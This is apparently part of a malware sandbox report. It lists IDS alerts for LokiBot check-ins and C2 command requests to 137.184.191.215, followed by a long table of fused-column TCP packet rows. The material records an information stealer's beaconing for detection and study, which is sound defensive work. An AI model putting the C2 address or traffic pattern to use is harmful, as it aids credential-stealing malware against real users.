                        2024-10-01T07:47:47.079801+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49732 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:47.079801+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49732 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:49.642741+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49732 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:49.795411+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49733 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:49.795411+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49733 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:52.405586+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49733 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:52.566806+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49734 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:52.566806+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49734 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:55.095844+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49734 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:55.539715+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49735 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:55.539715+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49735 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:58.090306+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49735 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:58.249624+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49736 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:47:58.249624+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49736 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:00.871063+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49736 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:01.034428+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49737 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:01.034428+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49737 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:03.631363+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49737 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:03.781971+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49738 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:03.781971+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49738 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:06.420098+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49738 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:06.581937+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49739 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:06.581937+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49739 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:09.193755+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49739 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:09.408894+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49740 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:09.408894+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49740 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:12.018888+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49740 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:12.173913+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49741 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:12.173913+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49741 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:14.774319+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49741 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:14.938921+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49742 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:14.938921+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49742 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:17.521559+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49742 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:17.676415+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49743 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:17.676415+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49743 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:20.266760+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49743 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:20.422456+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49744 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:20.422456+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49744 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:23.061415+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49744 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:23.217240+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.5 | 49745 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:23.217240+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.5 | 49745 | 137.184.191.215 | 80 | TCP
                        2024-10-01T07:48:25.861936+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.5 | 49745 | 137.184.191.215 | 80 | TCP
                        Timestamp  Source Port  Dest Port  Source IP  Dest IP
                        Oct 1, 2024 07:46:28.818224907 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.823704004 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.823781013 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.823798895 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.824100971 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.824132919 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.824163914 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.824177027 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.824217081 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.824224949 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.829576015 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.829627037 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.829653978 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.829660892 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.829699993 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.829720974 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.829770088 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.829811096 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.829821110 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.835203886 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.835284948 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.835333109 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.835477114 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.835506916 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.835524082 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.835529089 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.835539103 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.835599899 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.841404915 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.841463089 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.841486931 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.841538906 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.841577053 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.841607094 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.841618061 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.841629028 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.841649055 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.846000910 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.846052885 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.846075058 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.846173048 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.846198082 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.846224070 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.846225023 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.846234083 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.846259117 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.849443913 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.849468946 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.849498034 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.849507093 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.849549055 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.849728107 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.849773884 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.849806070 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.849814892 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.856858015 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.856916904 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.856930017 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.856964111 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.857038021 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.857045889 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.857132912 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.857171059 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.857180119 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.861150026 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.861183882 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.861207962 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.861222029 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.861285925 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.861293077 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.861335039 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.868446112 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.868496895 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.868521929 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.868546009 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.868599892 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.868607998 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.868647099 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.868709087 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.868716002 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.881767035 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.881798029 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.881856918 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.881886005 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.881885052 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.881917953 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.881936073 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.881978035 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.881984949 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.882042885 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.882072926 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.882077932 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.882086039 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.882122040 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.882576942 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.882669926 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.882704020 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.882710934 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.882891893 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.882976055 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.882982969 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.883101940 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.883137941 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.883146048 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.883153915 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.883196115 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.883203030 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.888114929 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.888220072 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.888230085 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.888312101 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.888341904 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.888359070 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.888365984 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.888401031 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.889651060 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.889731884 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.889759064 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.889772892 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.889784098 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.889810085 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.889838934 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.889847040 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.889883041 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.895936012 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.896145105 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.896172047 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.896286964 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.896311998 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.896320105 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.896337032 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.896367073 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.896404028 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.906666040 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.906793118 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.906821966 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.906852007 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.906867981 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.906879902 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.906893015 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.906918049 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.906948090 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.912677050 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.912736893 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.912765980 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.912786961 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.912795067 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.912805080 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.912831068 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.917889118 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.917952061 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.917994976 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.918204069 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.918247938 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.918256044 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.918564081 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.918587923 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.918612003 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.918622017 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.918663025 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.923693895 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.923757076 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.923785925 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.923809052 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.923823118 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.923832893 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.923881054 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.929706097 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.929781914 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.929807901 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.929860115 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.929893017 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.929898977 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.929908037 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.929945946 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.929954052 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.934403896 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.934436083 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.934463978 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.934483051 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.934498072 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.934533119 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.934592962 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.934638023 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.935199976 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:56.447560072 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:56.447632074 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:56.447722912 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:56.455466986 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:56.455503941 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.118269920 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.118546963 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.119065046 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.119164944 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.184777975 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.184818029 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.185211897 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.185281992 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.188097000 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.235403061 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.523981094 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.524095058 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.524646044 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.524688959 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.524714947 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.524847984 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.524892092 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.524892092 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.524919033 CEST44349713142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:57.525022030 CEST49713443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:57.548871040 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:57.548913956 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:57.549001932 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:57.549527884 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:57.549539089 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:58.187659025 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:58.187758923 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:58.286092997 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:58.286120892 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:58.286529064 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:58.289851904 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:58.297779083 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:58.339446068 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:00.958813906 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:00.958894968 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:00.964214087 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:00.964303017 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:00.976799011 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:00.976834059 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:00.977046013 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:00.977072954 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:00.977116108 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:00.982961893 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:00.983047962 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.046626091 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.046727896 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.046734095 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.046755075 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.046787977 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.046813965 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.047586918 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.047629118 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.047637939 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.047677994 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.055448055 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.055511951 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.055525064 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.055569887 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.061439037 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.061503887 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.061512947 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.061551094 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.068084955 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.068162918 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.068170071 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.068205118 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.074364901 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.074417114 CEST49714443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:47:01.074421883 CEST44349714142.250.184.193192.168.2.5
                        Oct 1, 2024 07:47:01.074460030 CEST49714443192.168.2.5142.250.184.193
